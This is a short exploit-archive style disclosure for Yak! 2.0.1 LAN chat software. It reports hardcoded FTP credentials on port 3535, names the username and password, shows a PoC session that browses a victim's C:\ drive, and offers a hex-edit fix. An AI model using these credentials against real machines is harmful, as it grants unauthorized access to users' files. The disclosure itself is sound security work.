Yak! 2.0.1 file trasfer exploit
http://www.digicraft.com.au/yak/
yak 2.0.1 is a software for chattin in lan environment for windows
it supports file transfers. the default port it listens is 3535.
connecting at 3535
telnet localhost 3535 gives up nice :
" 220 ICS FTP Server ready. "
meaning for file transfers ftp is being used. but the real pain starts when
just by listening with a sniffer it was found ...
username : Yak
password : asd123
and logging in with this credentials gives almost full permission to the users'
filesystem.
======================PoC========================
ftp> open localhost 3535
Connected to desktop.
220 ICS FTP Server ready.
User (desktop:(none)): Yak
331 Password required for Yak.
Password:
230 User Yak logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
C:\TEMP\*.* not found
226 File sent ok
ftp: 23 bytes received in 0.01Seconds 1.53Kbytes/sec.
ftp> cd ..
250 CWD command successful. "C:/" is current directory.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 0 Aug 07 19:58 CONFIG.SYS
-rwxrwxrwx 1 ftp ftp 0 Aug 07 19:58 AUTOEXEC.BAT
drw-rw-rw- 1 ftp ftp 0 Sep 08 00:42 yak201
-r--r--r-- 1 ftp ftp 783764060 Sep 04 01:05 AVSEQ00.DAT
-r--r--r-- 1 ftp ftp 793687148 Sep 04 02:27 AVSEQ01.DAT
-rw-rw-rw- 1 ftp ftp 217 Sep 09 11:53 bil.reg
drw-rw-rw- 1 ftp ftp 0 Aug 07 21:03 Program Files
drw-rw-rw- 1 ftp ftp 0 Aug 09 01:39 test
drw-rw-rw- 1 ftp ftp 0 Aug 30 10:17 Norton AntiVirus
226 File sent ok
ftp: 594 bytes received in 0.00Seconds 594000.00Kbytes/sec.
ftp>
======================PoC========================
QUICK FIX :
-----------
with a hexeditor i found "asd123" <- the password
at offset :
A5B40
A5E81
changing the 6 char password to anything else like -> "asX12X" may
be a quick fix.
also the username changing should result the same.